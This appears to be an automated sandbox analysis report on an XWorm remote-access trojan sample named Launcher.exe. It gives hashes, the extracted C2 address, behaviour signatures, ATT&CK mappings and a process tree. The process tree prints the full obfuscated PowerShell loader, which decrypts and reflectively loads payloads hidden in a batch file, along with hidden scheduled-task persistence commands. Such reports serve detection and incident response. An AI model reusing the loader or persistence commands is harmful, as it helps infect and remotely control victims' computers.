Overview

overview

10

Static

static

3

Launcher.exe

windows10-2004-x64

10

Resubmissions

25/09/2024, 14:52

240925-r8vsba1elp 10

25/09/2024, 14:49

240925-r631xavbmf 10

Analysis

  • max time kernel
    129s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25/09/2024, 14:49

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Launcher.exe

  • Size

    7.4MB

  • MD5

    86e47632419e01d5a5a102ca0b9273e1

  • SHA1

    1819b64f21b0290b0610899f4d4c64f6152a3cfc

  • SHA256

    36caf389f8c2d1898c6a5b2df76b44dc5953852141b10c21ce4e8ea2db55b2b9

  • SHA512

    f4d1901dedd42716a9343168afe013c19bb983f7c3e473b1216979aef54f882214013a66b8722e79ef94ff0d50e829372c47bbd27fbf2b0f43fefc0692c8052f

  • SSDEEP

    98304:wTwedwe0xX21lEsTv9gubxzuVEXjqjvnvSboSM:wtwe0xXCWxubxzujvS8SM

Score
10/10
xwormdiscoveryexecutionpersistenceransomwarerattrojan

Malware Config

Extracted

Family

xworm

Version

5.0

C2

89.85.183.63:928

Mutex

ImuGwJzkMH1FDK0U

Attributes
  • Install_directory

    %AppData%

  • install_file

    USB.exe

aes.plain

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

    execution
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Drops desktop.ini file(s) 17 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
    evasionspywaretrojan
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 17 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 33 IoCs
  • Suspicious use of SendNotifyMessage 32 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\Launcher.exe
    "C:\Users\Admin\AppData\Local\Temp\Launcher.exe"
    1⤵
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:32
    • C:\Windows\system32\wscript.exe
      wscript C:\Users\Admin\AppData\Local\Temp\seDGsMXwV7.vbs C:\Users\Admin\AppData\Local\Temp\seDGsMXwV7.bat
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:1848
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\seDGsMXwV7.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2904
        • C:\Windows\system32\net.exe
          net file
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3516
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 file
            5⤵
              PID:2352
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dKf7gcQ929Oc7g0ElBNFOpMBFb8jbwMLhvGP43UPh20='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5jRuOKduZsFFzTiTcHd89A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $xrcEr=New-Object System.IO.MemoryStream(,$param_var); $RFVUj=New-Object System.IO.MemoryStream; $pNxOF=New-Object System.IO.Compression.GZipStream($xrcEr, [IO.Compression.CompressionMode]::Decompress); $pNxOF.CopyTo($RFVUj); $pNxOF.Dispose(); $xrcEr.Dispose(); $RFVUj.Dispose(); $RFVUj.ToArray();}function execute_function($param_var,$param2_var){ $pNGMt=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $BRZOL=$pNGMt.EntryPoint; $BRZOL.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\seDGsMXwV7.bat';$Mnidd=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\seDGsMXwV7.bat').Split([Environment]::NewLine);foreach ($WvKGY in $Mnidd) { if ($WvKGY.StartsWith(':: ')) { $KRBOT=$WvKGY.Substring(3); break; }}$payloads_var=[string[]]$KRBOT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2532
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_446_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_446.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:784
            • C:\Windows\System32\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_446.vbs"
              5⤵
              • Checks computer location settings
              • Suspicious use of WriteProcessMemory
              PID:2708
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_446.bat" "
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:4080
                • C:\Windows\system32\net.exe
                  net file
                  7⤵
                  • Suspicious use of WriteProcessMemory
                  PID:400
                  • C:\Windows\system32\net1.exe
                    C:\Windows\system32\net1 file
                    8⤵
                      PID:2040
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dKf7gcQ929Oc7g0ElBNFOpMBFb8jbwMLhvGP43UPh20='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5jRuOKduZsFFzTiTcHd89A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $xrcEr=New-Object System.IO.MemoryStream(,$param_var); $RFVUj=New-Object System.IO.MemoryStream; $pNxOF=New-Object System.IO.Compression.GZipStream($xrcEr, [IO.Compression.CompressionMode]::Decompress); $pNxOF.CopyTo($RFVUj); $pNxOF.Dispose(); $xrcEr.Dispose(); $RFVUj.Dispose(); $RFVUj.ToArray();}function execute_function($param_var,$param2_var){ $pNGMt=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $BRZOL=$pNGMt.EntryPoint; $BRZOL.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_446.bat';$Mnidd=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_446.bat').Split([Environment]::NewLine);foreach ($WvKGY in $Mnidd) { if ($WvKGY.StartsWith(':: ')) { $KRBOT=$WvKGY.Substring(3); break; }}$payloads_var=[string[]]$KRBOT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                    7⤵
                    • Blocklisted process makes network request
                    • Command and Scripting Interpreter: PowerShell
                    • Drops startup file
                    • Adds Run key to start application
                    • Drops desktop.ini file(s)
                    • Sets desktop wallpaper using registry
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of WriteProcessMemory
                    PID:1992
                    • C:\Windows\System32\schtasks.exe
                      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Runtime Brocker" /tr "C:\Users\Admin\AppData\Roaming\Runtime Brocker"
                      8⤵
                      • Scheduled Task/Job: Scheduled Task
                      PID:5108
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\How To Decrypt My Files.html
                      8⤵
                      • Enumerates system info in registry
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of SendNotifyMessage
                      • Suspicious use of WriteProcessMemory
                      PID:2928
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffcc4c746f8,0x7ffcc4c74708,0x7ffcc4c74718
                        9⤵
                          PID:3448
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,6969900934698024772,11114218063639144920,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2104 /prefetch:2
                          9⤵
                            PID:2904
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2080,6969900934698024772,11114218063639144920,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 /prefetch:3
                            9⤵
                            • Suspicious behavior: EnumeratesProcesses
                            PID:1036
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2080,6969900934698024772,11114218063639144920,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3012 /prefetch:8
                            9⤵
                              PID:2008
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,6969900934698024772,11114218063639144920,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
                              9⤵
                                PID:2828
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,6969900934698024772,11114218063639144920,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
                                9⤵
                                  PID:4332
                                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2080,6969900934698024772,11114218063639144920,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4752 /prefetch:8
                                  9⤵
                                    PID:4980
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2080,6969900934698024772,11114218063639144920,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4752 /prefetch:8
                                    9⤵
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:4964
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,6969900934698024772,11114218063639144920,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5312 /prefetch:1
                                    9⤵
                                      PID:2180
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,6969900934698024772,11114218063639144920,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5208 /prefetch:1
                                      9⤵
                                        PID:1308
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,6969900934698024772,11114218063639144920,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
                                        9⤵
                                          PID:232
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,6969900934698024772,11114218063639144920,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5304 /prefetch:1
                                          9⤵
                                            PID:1968
                          • C:\Users\Admin\AppData\Roaming\Runtime Brocker
                            "C:\Users\Admin\AppData\Roaming\Runtime Brocker"
                            1⤵
                            • Executes dropped EXE
                            • Suspicious behavior: EnumeratesProcesses
                            PID:4440
                          • C:\Windows\System32\CompPkgSrv.exe
                            C:\Windows\System32\CompPkgSrv.exe -Embedding
                            1⤵
                              PID:3532
                            • C:\Windows\System32\CompPkgSrv.exe
                              C:\Windows\System32\CompPkgSrv.exe -Embedding
                              1⤵
                                PID:2736
                              • C:\Users\Admin\AppData\Roaming\Runtime Brocker
                                "C:\Users\Admin\AppData\Roaming\Runtime Brocker"
                                1⤵
                                • Executes dropped EXE
                                • Suspicious behavior: EnumeratesProcesses
                                PID:2784
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefault33e0e186h976fh4a91hae47h2b3982b1cdc1
                                1⤵
                                  PID:4636
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffcc4c746f8,0x7ffcc4c74708,0x7ffcc4c74718
                                    2⤵
                                      PID:5208
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2196,2532543346782406179,5782192837464108369,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2204 /prefetch:2
                                      2⤵
                                        PID:5464
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2196,2532543346782406179,5782192837464108369,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2264 /prefetch:3
                                        2⤵
                                          PID:5472

                                      Network

                                      MITRE ATT&CK Enterprise v15

                                      Reconnaissance

                                      Resource Development

                                      Initial Access

                                      Execution

                                      Command and Scripting Interpreter

                                      1
                                      T1059

                                      PowerShell

                                      1
                                      T1059.001

                                      Scheduled Task/Job

                                      1
                                      T1053

                                      Scheduled Task

                                      1
                                      T1053.005

                                      Persistence

                                      Boot or Logon Autostart Execution

                                      1
                                      T1547

                                      Registry Run Keys / Startup Folder

                                      1
                                      T1547.001

                                      Scheduled Task/Job

                                      1
                                      T1053

                                      Scheduled Task

                                      1
                                      T1053.005

                                      Privilege Escalation

                                      Boot or Logon Autostart Execution

                                      1
                                      T1547

                                      Registry Run Keys / Startup Folder

                                      1
                                      T1547.001

                                      Scheduled Task/Job

                                      1
                                      T1053

                                      Scheduled Task

                                      1
                                      T1053.005

                                      Defense Evasion

                                      Modify Registry

                                      3
                                      T1112

                                      Subvert Trust Controls

                                      1
                                      T1553

                                      Install Root Certificate

                                      1
                                      T1553.004

                                      Credential Access

                                      Discovery

                                      Browser Information Discovery

                                      1
                                      T1217

                                      Query Registry

                                      3
                                      T1012

                                      System Information Discovery

                                      3
                                      T1082

                                      Lateral Movement

                                      Collection

                                      Command and Control

                                      Exfiltration

                                      Impact

                                      Defacement

                                      1
                                      T1491

                                      Replay Monitor

                                      Loading Replay Monitor...

                                      Downloads

                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Runtime Brocker.log
                                        Filesize

                                        3KB

                                        MD5

                                        3f01549ee3e4c18244797530b588dad9

                                        SHA1

                                        3e87863fc06995fe4b741357c68931221d6cc0b9

                                        SHA256

                                        36b51e575810b6af6fc5e778ce0f228bc7797cd3224839b00829ca166fa13f9a

                                        SHA512

                                        73843215228865a4186ac3709bf2896f0f68da0ba3601cc20226203dd429a2ad9817b904a45f6b0456b8be68deebf3b011742a923ce4a77c0c6f3a155522ab50

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                        Filesize

                                        3KB

                                        MD5

                                        661739d384d9dfd807a089721202900b

                                        SHA1

                                        5b2c5d6a7122b4ce849dc98e79a7713038feac55

                                        SHA256

                                        70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

                                        SHA512

                                        81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                        Filesize

                                        152B

                                        MD5

                                        27304926d60324abe74d7a4b571c35ea

                                        SHA1

                                        78b8f92fcaf4a09eaa786bbe33fd1b0222ef29c1

                                        SHA256

                                        7039ad5c2b40f4d97c8c2269f4942be13436d739b2e1f8feb7a0c9f9fdb931de

                                        SHA512

                                        f5b6181d3f432238c7365f64fc8a373299e23ba8178bcc419471916ef8b23e909787c7c0617ab22e4eb90909c02bd7b84f1386fbc61e2bdb5a0eb474175da4bd

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                        Filesize

                                        152B

                                        MD5

                                        9e3fc58a8fb86c93d19e1500b873ef6f

                                        SHA1

                                        c6aae5f4e26f5570db5e14bba8d5061867a33b56

                                        SHA256

                                        828f4eacac1c40b790fd70dbb6fa6ba03dcc681171d9b2a6579626d27837b1c4

                                        SHA512

                                        e5e245b56fa82075e060f468a3224cf2ef43f1b6d87f0351a2102d85c7c897e559be4caeaecfdc4059af29fdc674681b61229319dda95cb2ee649b2eb98d313e

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                        Filesize

                                        152B

                                        MD5

                                        2a9da1588c85826bfbc09bbc10adfd80

                                        SHA1

                                        461bf2c50818255b47d4235c54dce7fb85bce2fa

                                        SHA256

                                        e843f6ae2c7b9ad3f3e54ca3210ddd4cc6bc94d65c977a911a24418846844842

                                        SHA512

                                        8cf81d52ab449625fcc07169157d8bcaa2e60cd582977552b8f5d63653986edbd11479aff78df8adcdaabf7fcd8b081203da5715f2e9f5b04fed1c56984e9045

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                        Filesize

                                        6KB

                                        MD5

                                        d2490aecd799ebf32a80dec4089da25b

                                        SHA1

                                        52da4802606c3bf9ec94ef1a8e3a78d90ce4d76e

                                        SHA256

                                        a9cd3d475d717e92d053fd100d8991340da8d9f797b4c80a8d6175b808304da5

                                        SHA512

                                        e410b57a88458ed44503f6b3eb62c0b28da54528d4305d8a529b88610779541e761596aac4173b5ecbc43879362d54e59873d94dae60eff097221385e8e8c278

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                        Filesize

                                        5KB

                                        MD5

                                        38f41364ebc964da8dcd690e14b5ff8b

                                        SHA1

                                        52bf101bb2f3f7ec89cbbd18f7da0777fdd49390

                                        SHA256

                                        69fc24d78b605a304c38fd48248bf6caa369593031b81eb68a0225acdc4b50c9

                                        SHA512

                                        1d7f6f4050501f28f6f11881d0e926d61046369c71601b046791fc21b2cdf220238ed9f35c4f5f6396aa209defced16916d1b60fc334dc177c12e5b4748b7885

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                        Filesize

                                        6KB

                                        MD5

                                        2e44c81843c67c7fae099b88ea060f61

                                        SHA1

                                        76deee07b809c02effed43ee507a310333d96639

                                        SHA256

                                        f826c90f2dec6bde550b3f348dbacadffa08d50ae53f7a9fcf7b1a95e6116f98

                                        SHA512

                                        ab2244512f475f55851ef4296e43d9a04b59c5ebb8a82ee0f672ede9be8ae3dc716e3db1da5eb66aa1ce41afe0515bc2e216d500cec376421f3a62b23a04adc8

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
                                        Filesize

                                        16B

                                        MD5

                                        6752a1d65b201c13b62ea44016eb221f

                                        SHA1

                                        58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                        SHA256

                                        0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                        SHA512

                                        9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                        Filesize

                                        10KB

                                        MD5

                                        a2955cd9a55ffc2455a267b02a82cf3b

                                        SHA1

                                        fde186b007a5d933702b8bd61f2b87c4a675ad8b

                                        SHA256

                                        9e2763c097fc9cbbed10d8b1c885a91c90035c1a1607d11ab957173311c0c746

                                        SHA512

                                        502611a3433c33e71fef45b495e8fd33985320c3e9afefe1169915d989cf81fc1492988f281edb98d83fd5b8d5ac12a5cc778100c6e516dd380abf4c89971f5e

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                        Filesize

                                        10KB

                                        MD5

                                        487750e683ab1b66379315ef85632614

                                        SHA1

                                        7e0d493d1082c34f94f609095c5d6e3f3312d429

                                        SHA256

                                        5a5e9e38acef1c263951f0e4f61e9a82183a42c43b2a864bab85766529ecc8c5

                                        SHA512

                                        cdf8544637a6b5ae962b7af650969e2ccced4118a215ba2cd01b9cf4a026af5b485512b64090d810272f6367a447c32e331aca960e6a969abe4a70fcf484d5e4

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                        Filesize

                                        10KB

                                        MD5

                                        f50a25eb41133ae02b690bfe4fbf1d45

                                        SHA1

                                        5cc25fb6cba6bc8a58773b19a81ae8c892daaf37

                                        SHA256

                                        36299af0a7e52f0e133d211a17dd743a97c0e0b32250e645693400981e4dde4a

                                        SHA512

                                        ff321638f3c4b162e449e1a261549dbb3d025a805b7ccaf13cad84586c7988f95b74893b77e7bf9301482718d6f76e9eb1a8e1807f7ea4d28567a5bd0337cf00

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
                                        Filesize

                                        2KB

                                        MD5

                                        6e6d88960a2258f4590e97c382884634

                                        SHA1

                                        244736513d2d071227c3df04532e67c818e7c9cd

                                        SHA256

                                        84cc5d85e71eed874541bd9724ebec8827a12b730b72bd8040fec29ab8a37a50

                                        SHA512

                                        d2d5d9aa3fb3b9ac0984f2d06da26c857f6d5479a41caa6b54e04e59b9682283219223a7b217cb9e719bad57381030aa87a9b92a6ed15d865f6d6b1eb96bce2b

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                        Filesize

                                        1KB

                                        MD5

                                        0854dd9a92ee6b91d636302617f52547

                                        SHA1

                                        aba002629c90c6bb00b21532e7e711bdfdd602db

                                        SHA256

                                        3050fd9aac7e796cfb3e185467486faf28485325c41224ebd7dceae982e71f25

                                        SHA512

                                        b11851ccee363d566471ad37551ad08cb2aa793043b71136db8e68e804c2abd54cd774242583869984682d22b3e94679104b920a445c7409c70fc349a197950a

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_o1tjxqbv.uvp.ps1
                                        Filesize

                                        60B

                                        MD5

                                        d17fe0a3f47be24a6453e9ef58c94641

                                        SHA1

                                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

